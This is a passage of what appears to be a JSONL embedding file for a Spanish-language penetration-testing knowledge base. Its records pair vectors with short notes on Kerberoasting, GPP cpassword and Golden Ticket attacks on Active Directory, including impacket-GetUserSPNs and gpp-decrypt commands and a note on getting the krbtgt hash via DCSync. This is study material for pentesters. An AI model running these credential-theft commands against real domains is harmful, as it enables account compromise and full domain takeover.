-0.07091, 0.00498, 0.02279, 0.06322, 0.03697, 0.05795, -1e-05, 0.0326, -0.02437, -0.01376, 0.02124, -0.04157, 0.02159, 0.01975, -0.05574, -0.02205, -0.08571, -0.06267, -0.00119, -0.07326, 0.0501, -0.02161, 0.09147, -0.07248, -0.01028, 0.05716, 0.04991, -0.03899, 0.05492, -0.09265, 0.00213, -0.00652, 0.00351, -0.02727, 0.01965, -0.03782, -0.0182, 0.01045, 0.00342, -0.0829, 0.04186, -0.03084, 0.00615, -0.00539, 0.05363, -0.0757, -0.03712, -0.03686, -0.02718, 0.02137, 0.04051, 0.06831, 0.03726, -0.04194, 0.02141, 0.01141, -0.08401, 0.03119, 0.07761, -0.03281, 0.02952, -0.00979, 0.02947, 0.02807, 0.0231, 0.00925, 0.06422, 0.04333, -0.05428, -0.01779, -0.01438, 0.01613, -0.04078, -0.02213, -0.04824, -0.05647, 0.00384, 0.02794, 0.01374, 0.04093, -0.03513, -0.08231, 0.02832, 0.00439, 0.02678, -0.00675, -0.07405, -0.01544, -0.0255, 0.00216, 0.00774, -0.04552, -0.03007, 0.01144, -0.00402, -0.11034, 0.05317, 0.0456]} +{"tipo": "metodologia", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "texto": "# Kerberoasting\n\n> Pides el **TGS** de cuentas de servicio (las que tienen **SPN**) y crackeas su hash offline. Uno de los 7 caminos de Active Directory.", "v": [0.03768, -0.1625, -0.08685, -0.03721, 0.0897, -0.2528, -0.03167, 0.00176, -0.03196, 0.14541, -0.03574, -0.00131, -0.02982, -0.12379, 0.04223, -0.06226, -0.04059, -0.03248, 0.09829, 0.09758, -0.0335, 0.08273, -0.0809, 0.04911, 0.03155, 0.05433, 0.05074, -0.02662, -0.17225, 0.05776, 0.03965, -0.06332, -0.0333, -0.07627, -0.01768, -0.09202, -0.11702, 0.1274, 0.17023, 0.11044, -0.01202, 0.04479, -0.01797, 0.07623, -0.00555, -0.00197, 0.00445, 0.00941, 0.04143, 0.0142, -0.01154, -0.10439, -0.19776, -0.02232, -0.04474, -0.01783, 0.06558, 0.00399, -0.18287, -0.04974, 0.01474, -0.06088, -0.02936, -0.08605, -0.02688, -0.20069, 0.06115, -0.05551, -0.10705, 0.0338, -0.05073, 0.0987, 0.05797, 0.0291, 0.07587, -0.05163, 0.06755, -0.03302, -0.01436, 0.11302, 0.0826, -0.09829, 0.00309, 0.10973, -0.14194, -0.07199, -0.03839, -0.05809, 0.03555, 0.03773, -0.02877, 0.13801, -0.0583, 0.13176, -0.04052, 0.0516, 0.02869, 0.01261, 0.07875, 0.02195, -0.03257, 0.00968, -0.07579, -0.02443, -0.05171, 0.06231, 0.03108, 0.03299, 0.03915, 0.02669, 0.09742, 0.02472, 0.01593, -0.02099, 0.01163, 0.11133, -0.07049, -0.02658, 0.0273, 0.0121, -0.03721, 0.00445, 0.03268, 0.03523, 0.06518, -0.0295, -0.04274, 0.0388, 0.00884, -0.01959, 0.01724, -0.02471, -0.05969, -0.06022, -0.01692, 0.02938, 0.06762, 0.00145, 0.03389, -0.0451, 0.01646, 0.01107, 0.00467, -0.01121, 0.15394, -0.01152, -0.03426, -0.01942, -0.04764, 0.05409, 0.03254, 0.06047, -0.04255, 0.00444, 0.01816, 0.0223, -0.01825, -0.02309, -0.00392, 0.09287, -0.01577, -0.00601, 0.09767, 0.07739, -0.04339, -0.07541, -0.01497, -0.03437, 0.05243, -0.01069, -0.04944, 0.02536, -0.03456, -0.11248, -0.06266, -0.06818, 0.03335, -0.04633, -0.03983, -0.00985, -0.0397, -0.0532, 0.00511, 0.03647, -0.08696, 0.05855, 0.01263, -0.06347, -0.01517, -0.05278, 0.04298, -0.01638, -0.0577, 0.02566, -0.01049, -0.03422, 0.0635, -0.05749, 0.01801, -0.10776, -0.1066, 0.03417, 0.01587, -0.03066, 0.01189, 0.04221, -0.03872, 0.0646, -0.06761, 0.00262, -0.00061, -0.1162, 0.05772, -0.07123, -0.07676, -0.00248, -0.03735, -0.00413, -0.02179, 0.04943, -0.07559, 0.0366, 0.07995, -0.01311, 0.00632, 0.04098, 0.03536, -0.01675, 0.02512, -0.00868, 0.00595, 0.01559, -0.00837, -0.03259, 0.04747, -0.01838, 0.03422, 0.00403, -0.07561, 0.01124, -0.00041, 0.05124, 0.0415, 0.03563, -0.044, -0.05154, -0.03707, 0.01595, 0.01206, -0.06584, 0.00544, -0.02032, -0.02231, -0.01098, -0.03464, -0.00338]} +{"tipo": "metodologia", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "texto": "## Ataque\n```bash\nimpacket-GetUserSPNs dominio/usuario:password -dc-ip IP -request", "v": [-0.04273, -0.07096, -0.11746, -0.12626, 0.02464, -0.23996, 0.06989, -0.14449, -0.16982, 0.18649, 0.05635, -0.06439, -0.05876, -0.13782, -0.14131, -0.05109, 0.07987, 0.1055, 0.10321, -0.09448, 0.06, 0.14688, -0.06757, -0.00643, -0.0628, 0.05847, -0.06344, 0.05673, -0.04908, -0.01378, -0.06053, -0.14705, -0.1444, -0.03527, -0.13284, -0.1576, 0.05642, 0.06084, 0.07275, 0.17129, 0.03029, 0.03484, -0.19221, 0.09612, -0.00711, 0.0823, 0.02534, -0.07652, 0.05007, -0.16224, -0.08436, -0.10903, -0.04769, -0.01537, -0.04019, 0.06058, 0.13007, -0.04871, -0.04496, 0.03965, -0.07746, 0.01322, -0.04807, 0.0632, 0.00966, -0.08109, -0.03641, -0.0659, -0.04661, 0.05297, 0.00093, -0.01794, -0.07583, 0.04772, 0.13857, -0.03837, 0.02755, -0.05722, 0.10527, 0.06411, -0.05322, 0.06357, -0.10433, -0.06025, -0.14397, -0.05886, 0.02128, -0.08817, 0.07922, -0.01528, 0.09764, 0.01953, -0.05682, 0.00083, 0.0408, -0.08922, -0.00634, -0.0087, -0.05785, -0.07332, -0.04631, 0.13219, -0.06119, 0.06091, 0.08848, 0.0072, 0.05408, 0.04342, 0.03091, 0.00261, 0.03701, -0.01176, 0.01215, -0.05786, 0.04878, 0.05274, -0.09288, -0.03984, 0.0496, -0.05239, -0.00231, -0.01249, -0.00293, 0.0001, 0.00799, 0.03034, 0.02851, -0.0018, -0.04727, -0.09373, -0.02113, -0.04038, 0.00702, 0.02865, 0.03881, 0.05898, -0.03975, -0.06943, -0.06965, 0.05048, 0.0235, 0.00706, -0.08589, 0.06307, 0.05319, -0.03673, 0.05653, -0.07068, -0.053, 0.01435, 0.01886, 0.00699, -0.02088, -0.0065, -0.03347, 0.01597, -0.05894, -0.05818, 0.01435, 0.00402, -0.00137, 0.0062, -0.01811, 0.05784, 0.00663, 0.00542, -0.00303, 0.00019, 0.05391, 0.03294, -0.00761, 0.00573, 0.00907, -0.00625, -0.02612, -0.06128, 0.01207, -0.02352, 0.00563, -0.06627, -0.018, -0.05773, 0.00382, 0.00581, 0.01515, 0.00869, 0.07112, -0.00505, -0.03301, -0.0123, 0.06269, 0.03567, -0.04325, 0.01313, 0.03426, -0.05193, -0.02455, -0.03435, -0.01142, 0.00886, -0.03128, -0.00732, -0.0061, -0.01686, -0.03321, -0.0374, 0.01815, -0.02894, 0.00909, -0.05291, 0.01616, -0.00981, 0.01379, -0.07102, -0.06767, -0.00557, 0.01254, 0.04455, -0.03632, -0.05201, -0.03544, 0.0741, -0.01853, -0.00778, 0.02507, -0.01843, -0.00456, -0.02334, 0.01853, -0.02485, -0.0315, 0.05059, -0.02243, -0.02463, 0.05919, -0.02101, -0.03663, 0.01411, 0.01289, 0.01228, -0.03929, 0.01448, 0.01052, -0.01554, -0.0413, -0.01082, -0.06256, 0.02345, 8e-05, 0.01302, -0.0427, -0.0288, -0.05398, -0.00153, -0.02435, 0.00981]} +{"tipo": "metodologia", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "texto": "## Por qué funciona\nEl TGS va cifrado con el hash de la cuenta de servicio (Kerberos). Si su password es débil → crackeo → credencial nueva → Movimiento lateral.\n\nRelacionado: Cracking de contraseñas · AS-REP Roasting · Impacket · BloodHound · OSCP MOC", "v": [-0.23934, -0.19433, 0.0003, -0.07749, 0.07167, -0.24197, -0.01974, 0.10773, -0.0433, 0.08196, -0.12869, -0.05998, 0.06674, -0.12746, 0.16386, -0.00717, -0.05433, 0.00129, -0.00879, 0.08873, -0.05127, -0.04261, -0.08974, 0.02121, 0.10506, 0.09425, -0.07895, 0.07517, -0.13306, -0.05398, -0.03584, -0.07692, 0.01293, 0.01116, -0.05418, 0.0825, -0.05966, 0.06843, 0.12165, 0.2132, 0.02362, 0.03442, -0.08451, 0.05281, 0.07848, -0.07591, -0.00973, 0.03132, -0.01643, 0.10747, -0.09092, -0.12673, -0.17753, -0.0822, 0.00126, -0.0218, 0.0628, -0.02444, -0.12096, -0.01325, -0.04743, 0.09924, -0.04107, -0.03554, -0.05154, -0.1774, -0.03575, -0.07216, 0.00155, 0.10331, -0.04212, 0.11287, -0.06604, -0.02215, 0.02003, -0.02099, 0.11383, -0.05473, 0.13973, 0.09871, -0.03996, -0.02536, 0.02642, 0.00451, -0.1131, 0.04655, 0.04481, 0.01421, 0.06693, 0.00093, 0.1082, 0.09189, -0.03045, 0.05621, 0.01633, -0.08469, -0.09767, 0.01095, -0.07371, -0.08609, -0.03271, 0.0535, -0.02823, 0.04811, -0.02312, -0.04155, 0.02656, -0.03434, 0.06501, -0.07303, 0.12186, -0.01787, 0.00059, 0.00869, -0.08611, 0.0014, 0.06515, -0.06274, 0.07734, 0.06254, -0.0291, 0.04434, 0.08097, 0.00166, -0.02728, 0.04318, -0.0195, 0.03916, -0.01618, -0.07503, 0.00507, -0.01842, -0.10323, 0.01434, -0.04977, 0.00912, 0.00409, -0.04161, -0.03029, -0.05046, -0.03883, 0.00134, 0.00224, 0.0268, 0.04366, 0.06524, 0.06064, -0.02211, -0.00551, 0.05067, 0.06224, 0.03421, -0.00057, -0.01846, -0.00667, 0.00134, -0.02398, -0.07042, -0.07862, 0.06111, 0.00514, -0.06156, -0.03232, 0.0055, -0.10411, 0.00246, 0.03852, 0.00211, 0.06381, -0.01375, -0.00889, 0.01554, -0.01431, 0.01532, -0.01116, -0.03933, 0.05516, -0.05311, -0.04329, -0.06212, 0.01959, -0.08564, 0.0214, 0.0172, 0.01898, -0.02819, 0.05379, -0.02048, 0.01014, -0.05201, 0.03709, -0.04419, -0.0049, 0.02927, 0.03085, -0.06869, 0.05464, -0.07654, -0.02789, -0.01093, -0.00616, -0.02422, 0.01706, -0.04367, 0.05104, -0.00078, 0.01622, -0.00523, -0.06244, 0.00489, 0.00269, -0.03066, 0.04224, -0.05575, -0.04905, 0.00175, -0.01447, 0.00803, -0.03193, -0.00086, 0.00609, -0.00141, 0.02791, 0.03841, -0.01492, -0.01347, -0.01196, 0.00975, 0.03548, 0.02883, 0.05319, 0.03122, -0.02084, -0.03029, 0.05502, 0.01645, -0.07212, -0.00153, -0.028, 0.00166, 0.01678, 0.0154, 0.02558, -0.0206, -0.01935, -0.00691, -0.03127, -0.02841, 0.01658, 0.01477, -0.03668, 0.04141, -0.02332, -0.02422, 0.03262, -0.00698]} +{"tipo": "metodologia", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "texto": "# GPP cpassword\n\n> Group Policy Preferences que guardaban contraseñas cifradas con una **clave AES pública y fija** (Microsoft la publicó). Trivial de descifrar. Uno de los 7 caminos de Active Directory.", "v": [-0.07141, -0.09151, 0.01815, -0.26117, 0.08648, -0.15241, 0.04733, -0.12299, -0.14938, -0.06361, 0.1899, -0.08524, -0.0328, 0.00188, 0.1138, -0.09432, 0.10742, -0.1396, 0.03408, 0.02564, -0.01642, 0.02346, 0.00394, -0.17285, -0.00753, -0.05347, 0.00045, -0.10408, -0.08244, -0.05346, 0.08074, 0.00079, -0.03842, 0.02169, 0.0153, 0.10268, -0.03064, 0.03919, 0.0641, 0.06739, -0.0208, -0.01046, -0.14799, 0.07634, -0.00609, -0.05796, 0.05316, 0.00063, 0.02012, -0.01815, -0.07307, -0.09253, -0.08996, -0.08601, -0.073, 0.0707, -0.00127, 0.15193, -0.19578, 0.00526, -0.10685, 0.04388, -0.05821, 0.06339, -0.03999, -0.14862, 0.06947, 0.02534, -0.15802, 0.17011, 0.03642, -0.03968, -0.05293, 0.04214, 0.03499, -0.08426, 0.08221, -0.05863, 0.0413, 0.17077, 0.01674, -0.08424, -0.03295, -0.00921, -0.05127, -0.08163, 0.06543, 0.06034, 0.06727, 0.02212, 0.06952, -0.01809, -0.043, 0.0697, -0.00102, 0.01705, -0.02614, 0.06982, 0.00875, -0.04938, 0.02635, -0.03121, -0.04495, 0.04798, 0.00672, 0.0998, -0.00671, 0.0436, -0.00073, 0.00547, 0.08221, 0.07017, 0.03695, -0.06399, 0.07026, 0.05592, -0.02698, -0.09466, 0.03337, -0.01921, 0.02339, -0.0009, -0.03002, -0.01682, 0.06773, 0.08756, 0.01719, 0.00311, -0.11851, -0.00584, -0.06372, 0.03679, -0.00826, -0.03851, -0.03303, 0.08701, -0.01608, -0.06567, 0.03012, -0.02542, 0.0695, -0.0273, -0.00677, 0.03068, 0.0543, 0.0177, 0.05226, 0.02809, -0.07466, 0.0689, -0.00605, 0.02255, 0.01414, 0.01101, 0.03001, 0.03394, -0.02646, -0.03308, -0.05764, 0.10251, 0.06219, -0.011, -0.06848, 0.05668, -0.06767, -0.00878, -0.02894, -0.05715, 0.07934, 0.01615, -0.00791, 0.01629, -0.02033, -0.10542, -0.02697, -0.06229, 0.02062, -0.04777, 0.01415, 0.0001, -0.04364, -0.00361, -0.01295, 0.0587, 0.01377, -0.01831, 0.0561, -0.00292, -0.06892, 0.01259, 0.01541, -0.00314, 0.0143, 0.04181, -0.02506, -0.07806, -0.01856, -0.06519, 0.00337, -0.05568, -0.03398, 0.05909, 0.02231, -0.0413, -0.00996, -0.01636, -0.03143, 0.01536, -0.0196, 0.03323, 0.00359, -0.05311, -0.02435, -0.04936, -0.06329, -0.05991, -0.00545, 0.02592, -0.03656, 0.04841, -0.01928, 0.10487, 0.07614, -0.01169, 0.05601, 0.03289, -0.01183, -0.04011, 0.03486, -0.00319, 0.02031, -0.0104, -0.01532, 0.02576, 0.06807, -0.01407, -0.0219, -0.06617, -0.07233, -0.03015, -0.03315, 0.03313, 0.02185, -0.00141, -0.06097, -0.02185, -0.00665, -0.01041, 0.06196, -0.02881, -0.02843, -0.03255, -0.04126, -0.00862, 0.01144, -0.05384]} +{"tipo": "metodologia", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "texto": "## Dónde buscar\n```\n\\\\DC\\SYSVOL\\\\Policies\\...\\Groups.xml\n```\nBusca el atributo `cpassword` en `Groups.xml` (también en `Services.xml`, `ScheduledTasks.xml`, `Datasources.xml`).", "v": [-0.01355, 0.03922, 0.06024, -0.03487, -0.05383, -0.20982, 0.08987, -0.11388, 0.00185, 0.07839, -0.05033, -0.16954, -0.10023, -0.18968, -0.01078, -0.09182, 0.1732, -0.05145, -0.10464, -0.03399, 0.06081, -0.06455, -0.10778, -0.02031, -0.06526, -0.1013, -0.06197, -0.03583, -0.10312, 0.05954, 0.08239, -0.08926, -0.10036, -0.11616, -0.01128, -0.02335, 0.0268, 0.13645, -0.03783, -0.03086, -0.06898, -0.0236, -0.20308, 0.09604, -0.03204, 0.00166, 0.00675, 0.08484, -0.02378, -0.19667, -0.05129, 0.06946, -0.15273, -0.02627, 0.04517, -0.02232, 0.09358, -0.06838, -0.01173, -0.00542, 0.04012, 0.03345, -0.05994, 0.01268, -0.06957, 0.00979, 0.08482, 0.00127, -0.05276, 0.05367, -0.07886, -0.09583, 0.00144, -0.03852, 0.07974, -0.14288, 0.09681, -0.01249, 0.06539, 0.11036, -0.06886, -0.01143, -0.03646, -0.01475, 0.01467, -0.0772, 0.10534, -0.02334, -0.03287, -0.01537, 0.15065, 0.07057, -0.00087, -0.0123, -0.01659, -0.0632, 0.00442, -0.00571, 0.0822, -0.0026, 0.02383, 0.08061, -0.06254, 0.06666, 0.11144, 0.08249, 0.00187, -0.00547, -0.03112, -0.00989, 0.15009, -0.0731, 0.07685, 0.0173, 0.01808, 0.0294, -0.06376, 0.00794, 0.08758, 0.00728, 0.06544, -0.02611, 0.00342, 0.00313, -0.02259, -0.07776, -0.01762, -0.00174, 0.00261, -0.05016, -0.00255, -0.03917, -0.04516, -0.0318, -0.00478, 0.00061, 0.0711, 0.00323, 0.03009, 0.0109, 0.03252, -0.05493, 0.05304, 0.05802, 0.08807, 0.02284, 0.06628, -0.03374, -0.07707, -0.02246, -0.00559, 0.05834, -0.01749, 0.06894, -0.02708, 0.01853, -0.01695, -0.05328, -0.0251, -0.02882, -0.00069, -0.00206, 0.03747, 0.00655, 0.07717, -0.02861, 0.03239, -0.06694, 0.00917, -0.05112, -0.02255, 0.01025, -0.05244, -0.09713, -0.01852, -0.07818, 0.02678, -0.07672, 0.02056, 0.02275, 0.00092, -0.02337, 0.02592, 0.06272, -0.06734, -0.05005, 0.04018, -0.01538, -0.01335, -0.04421, -0.01324, 0.00466, -0.04191, -0.01183, 0.02169, -0.08917, 0.00536, -0.0131, -0.00357, -0.04684, -0.03776, -0.02722, -0.0097, -0.00686, 0.05415, 0.02398, 0.0145, 0.05152, -0.03416, 0.03304, -0.0142, 0.01556, 0.01351, -0.02697, -0.10083, -0.07562, 0.01618, -0.01028, -0.02203, 0.03257, -0.10042, 0.11856, 0.04705, -0.00841, 0.04281, 0.03628, 0.0566, -0.00935, 0.08058, 0.04351, -0.02879, 0.00332, -0.05736, -0.04092, 0.12205, 0.01126, -0.02413, -0.03836, -0.04024, -0.0123, 0.0451, 0.0346, -0.03545, -0.04609, -0.05924, -0.1052, -0.06255, 0.05373, 0.03709, -0.05471, 0.01485, -0.0276, 0.02164, -0.0162, 0.05202, -0.08525]} +{"tipo": "metodologia", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "texto": "## Descifrar\n```bash\ngpp-decrypt 'CPASSWORD_AQUI'\n```\n- Accedes a SYSVOL vía SMB (a menudo con sesión nula o cualquier user de dominio).", "v": [-0.27199, -0.2011, -0.12028, 0.00697, 0.0364, -0.20406, -0.07045, -0.15117, -0.17093, 0.12407, -0.09577, -0.10303, -0.05981, -0.13848, 0.03941, -0.08477, 0.06067, -0.08237, -0.06807, 0.18088, 0.12495, -0.04917, -0.04586, 0.00917, 0.1323, 0.07246, 0.03759, 0.02536, -0.03576, -0.00471, -0.03634, -0.09475, 0.09263, -0.00537, 0.02445, -0.01551, -0.02913, 0.045, 0.00814, 0.17934, -0.02999, -0.00639, -0.08883, 0.02784, 0.05725, -0.11843, -0.02932, 0.01335, -0.04252, -0.05911, -0.01511, -0.07129, -0.18519, -0.01718, -0.04748, 0.00715, 0.15635, -0.05536, -0.09092, -0.05226, -0.09114, 0.08403, 0.00146, 0.11001, 0.06898, -0.15764, 0.07426, -0.00555, -0.03882, 0.09653, -0.07754, -0.00983, 0.00652, 0.00304, 0.13515, -0.05744, 0.01706, -0.06079, 0.12492, 0.05565, -0.01632, -0.13251, -0.00474, -0.00063, -0.07627, 0.00494, 0.025, 0.00648, -0.01368, 0.02221, 0.07208, 0.07024, 0.01318, 0.05694, 0.02108, -0.08634, 0.01031, 0.05704, -0.00042, 0.013, 0.01847, 0.07323, -0.03951, 0.12646, 0.05587, 0.05976, 0.04265, 0.01895, 0.08651, -0.03207, 0.14192, -0.03149, 0.01132, -0.03492, -0.0539, -0.04351, -0.09334, -0.02311, 0.00808, -0.01115, -0.03545, -0.03473, -0.04949, 0.02688, -0.10407, 0.0064, -0.00931, 0.06301, -0.05945, -0.01954, -0.02956, -0.00782, 0.04021, -0.00079, 0.01557, 0.00747, -0.0253, -0.02291, -0.04361, -0.02983, 0.02042, 0.01774, -0.07815, 0.05399, 0.05805, -0.03924, 0.0446, -0.10671, -0.05359, 0.06716, 0.0957, 0.06007, 0.02355, 0.02468, 0.04577, 0.04353, -0.00181, -0.01628, -0.0274, 0.01721, -0.0051, 0.07202, 0.0337, 0.06778, -0.0192, 0.00021, -0.00107, 0.00932, -0.02141, -0.03266, -0.02565, -0.00303, -0.00734, -0.03272, -0.01211, -0.08853, 0.00115, -0.01236, 0.01395, -0.05555, 0.02175, -0.04803, -0.01989, 0.06588, -0.02195, 0.02712, 0.01098, 0.0163, 0.0318, 0.00977, -0.01095, 0.03931, -0.05302, -0.02436, -0.04623, 0.01286, -0.02404, 0.01847, 0.01448, 0.02368, 0.01897, 0.01447, -0.00767, -0.0043, 0.03658, -0.00183, -0.0146, -0.01492, -0.02594, -0.03404, -0.00339, -0.03301, 0.00724, -0.06272, -0.00448, -0.04789, -0.01364, -0.00642, 0.01757, -0.04716, -0.05581, 0.06409, 0.06787, 0.0209, -0.00655, 0.0768, 0.0013, -0.0004, 0.01905, -0.00634, 0.03317, 0.05011, -0.02594, 0.01087, 0.06387, 0.01516, -0.02482, 0.01403, -0.056, 0.01128, -0.02359, 0.0121, -0.00719, -0.0456, -0.04404, -0.0445, -0.02724, -0.05137, -0.01718, 0.03254, 0.00209, -0.01754, 0.01747, -0.01466, 0.01692, -0.02036]} +{"tipo": "metodologia", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "texto": "## Resultado\nCredenciales en claro → Movimiento lateral / Pass-the-Hash.\n\nRelacionado: SMB · OSCP MOC", "v": [-0.24995, -0.12658, 0.06274, -0.13529, -0.12553, -0.20849, -0.11117, 0.05681, -0.0847, 0.0576, 0.00544, 0.03523, 0.12711, -0.0741, 0.04055, 0.13573, 0.03985, -0.01613, -0.15579, -0.03915, 0.02813, -0.09269, -0.10848, -0.00795, 0.14574, 0.10333, -0.11279, 0.03689, -0.06719, -0.1208, -0.05715, 0.01609, -0.03313, 0.14118, -0.02021, 0.01204, -0.10838, -0.0463, 0.00873, 0.15311, -0.00706, 0.09336, -0.06305, 0.03523, 0.11403, -0.12775, 0.09575, 0.08196, -0.09499, -0.04606, 0.06998, -0.06632, -0.16067, -0.00423, -0.06107, 0.02975, 0.03105, 0.02664, -0.05743, 0.00281, -0.02697, 0.0331, 0.03923, -0.06814, -0.00074, -0.02873, -0.04731, -0.02244, -0.0473, 0.03054, -0.02405, 0.19874, 0.02426, 0.00256, -0.01072, 0.05838, 0.16009, -0.01947, 0.16128, 0.06457, -0.02177, -0.0906, 0.10351, -0.02544, -0.03732, 0.03658, 0.03163, -0.00606, 0.01885, 0.02782, 0.03379, 0.10987, -0.00794, 0.00493, 0.01183, -0.10754, -0.10443, -0.04489, -0.05392, -0.11036, -0.05952, 0.08224, 0.0152, -0.0098, -0.00741, -0.00909, 0.06955, 0.00493, 0.06055, 0.0871, 0.14201, -0.05692, 0.04889, 0.02978, -0.06607, 0.0431, 0.03203, -0.02703, -0.02722, 0.04759, -0.03095, 0.0766, 0.05786, -0.06055, -0.11204, 0.02145, 0.02116, 0.01534, -0.07453, 0.02248, -0.03179, -0.04646, -0.06995, -0.04361, -0.02913, -0.05099, 0.04684, 0.03536, 0.04745, -0.01229, -0.03922, -0.07695, -0.00352, 0.04947, 0.02299, -0.02562, 0.01293, 0.01386, 0.03253, -0.02411, 0.07034, 0.04176, 0.00719, -0.07656, 0.0569, 0.03484, 0.0, -0.01263, -0.05813, 0.01573, 0.02179, 0.02026, -0.03858, 0.00907, -0.01526, -0.00801, 0.06889, 0.01926, -0.03079, -0.04143, -0.03578, -0.03801, -0.0448, 0.00055, 0.0246, -0.04728, 0.06678, 0.01254, -0.04157, -0.00667, 0.04519, -0.08747, 0.05724, -0.03797, 0.03576, 0.01088, 0.03832, 0.04024, -0.01326, -0.03892, 0.01257, -0.03713, -0.00913, 0.01236, -0.00251, 0.01657, 0.07311, -0.02754, -0.03111, 0.03122, 0.00843, 0.00107, -0.01235, 0.02769, 0.04154, -0.03378, 0.03388, 0.04598, 0.02927, 0.00154, -0.00352, -0.01969, 0.03023, -0.02812, -0.03129, 0.05175, -0.01454, 0.01522, 0.0211, -0.00535, 0.02499, 0.00605, 0.00974, 0.03286, 0.03666, -0.03284, -0.07581, -0.02057, -0.08923, -0.01556, 0.08826, -0.02053, -0.00506, -0.0215, 0.04235, 0.0141, -0.05323, -0.0053, -0.00634, -0.02429, 0.00375, -0.09577, 0.08289, 0.02659, -0.04906, 0.03764, -0.02746, -0.05003, -0.02582, 0.00904, 0.02462, -0.04879, -0.02474, -0.04126, 0.01287, 0.04774]} +{"tipo": "metodologia", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "texto": "# Golden Ticket\n\n> Con el hash de **krbtgt** forjas tu propio TGT → eres **cualquiera** (incluso un Domain Admin inexistente), para siempre. Cima de Active Directory.", "v": [-0.01375, -0.10003, 0.00553, -0.00577, 0.02264, -0.09048, -0.03136, 0.16625, -0.10482, 0.14605, 0.02184, -0.07605, -0.11972, -0.03357, 0.06184, -0.00915, 0.09458, -0.10402, -0.0614, -0.00985, -0.00978, 0.04287, -0.04454, -0.00802, 0.06392, -0.04633, -0.03532, 0.00333, -0.06951, 0.06939, 0.15864, -0.1545, -0.0299, -0.03265, -0.05777, -0.10795, -0.03104, 0.10687, 0.0183, 0.13328, 0.1143, -0.00072, -0.04158, 0.23857, -0.00594, -0.01789, 0.02588, -0.08182, -0.03816, -0.05235, -0.08912, -0.08289, -0.14597, -0.09709, 0.06273, -0.04338, -0.00772, -0.10268, -0.13708, -0.07107, 0.01152, -0.07475, -0.1261, 0.00444, -0.05705, 0.0045, 0.02077, -0.03144, -0.0783, -0.00916, -0.08526, 0.02434, -0.04033, -0.00993, 0.18738, -0.07445, 0.10603, -0.04534, 0.0145, 0.06926, 0.03931, -0.08019, -0.00529, -0.02838, -0.06492, -0.16858, 0.05734, -0.21296, -0.07474, 0.03238, 0.1236, 0.03459, -0.0056, 0.01935, -0.04522, -0.07949, 0.07248, -0.03387, -0.01838, 0.05161, -0.00397, 0.13704, -0.00609, 0.11115, 0.08442, 0.03639, 0.08885, 0.00204, 0.01539, 0.05913, 0.01411, -0.07955, -0.08863, -0.09297, 0.0156, 0.07121, -0.0388, -0.06876, 0.12797, 0.0779, -0.03862, -0.08553, 0.01386, 0.0277, 0.04593, 0.02357, -0.111, 0.01563, 0.02738, 0.00718, -0.05655, 0.09691, 0.06134, -0.04611, -0.0297, 0.05537, 0.04623, 0.01806, 0.04042, -0.03614, -0.01942, 0.00286, 0.0175, -0.06323, 0.06971, -0.04421, -0.02515, -0.01071, 0.04051, 0.01526, -0.01484, 0.01795, 0.02176, 0.05743, 0.04568, 0.00302, 0.00408, -0.0308, -0.01071, -0.02053, 0.03786, 0.04129, 0.02354, 0.03391, -0.06604, 0.00568, -0.01152, -0.01346, -0.03726, 0.01374, 0.06147, 0.00052, -0.01922, -0.00326, -0.03855, -0.06131, 0.03909, -0.00303, 0.08751, -0.06057, 0.09226, -0.05165, 0.01862, 0.04252, -0.05674, 0.04308, 0.07029, 0.00616, 0.08659, -0.05955, -0.00205, 0.02412, 0.00434, 0.00984, -0.06664, -0.0074, 0.0409, -0.10192, 0.04265, -0.08865, -0.03179, 0.05604, 0.01429, -0.02849, 0.01046, -0.0417, 0.02325, 0.015, -0.04154, 0.01931, -0.04644, -0.02199, 0.02706, -0.03062, -0.06218, 0.03983, 0.00123, 0.00078, -0.01635, -0.01513, -0.06065, 0.0327, 0.0466, 0.00031, 0.0228, 0.01373, -0.00135, -0.00755, 0.10321, 0.05477, 0.00998, 0.03011, 0.00733, -0.00525, -0.00279, -0.00139, -0.00196, -0.05253, -0.0327, -0.01287, 0.01114, 0.02127, 0.00265, 0.07743, -0.00799, -0.04502, 0.03133, 0.07764, -0.01707, -0.03253, 0.00909, -0.03822, -0.03021, -0.07009, -0.03799, -0.01497]} +{"tipo": "metodologia", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "texto": "## Requisito\nHash NTLM de la cuenta **krbtgt** → se obtiene con DCSync o secretsdump sobre el DC.", "v": [-0.12016, -0.09285, 0.06547, -0.08256, 0.10749, -0.21678, -0.20149, 0.20336, -0.01725, 0.16735, -0.09537, -0.16459, -0.03799, -0.16408, -0.10782, 0.00174, -0.0626, 0.02385, -0.07712, -0.06919, 0.10636, -0.12868, -0.02738, -0.07871, 0.10515, -0.04657, -0.02516, 0.10623, -0.14215, 0.07077, 0.11277, -0.0851, -0.04696, 0.09559, 0.04032, -0.0894, -0.04869, 0.06136, 0.04257, 0.08405, 0.0241, -0.00916, -0.13847, 0.15901, 0.02011, -0.03878, -0.02475, -0.0199, 0.00937, -0.16169, -0.14413, 0.13704, -0.18842, -0.00374, -0.05564, 0.01322, -0.05485, 0.06011, 0.05921, 0.01916, -0.02919, 0.00684, -0.03671, -0.08974, -0.00543, -0.02707, -0.07183, -0.08414, -0.06998, 0.01342, -0.07372, 0.07203, 0.03426, -0.06505, 0.09378, 0.04021, 0.0145, -0.06192, 0.0636, 0.00303, 0.01987, -0.05434, -0.06804, 0.00915, -0.07873, -0.0571, 0.10359, -0.08032, -0.03404, -0.0161, 0.11347, 0.07394, -0.0272, 0.09631, 0.09409, -0.06851, 0.0098, 0.00421, 0.02579, -0.01204, 0.0131, 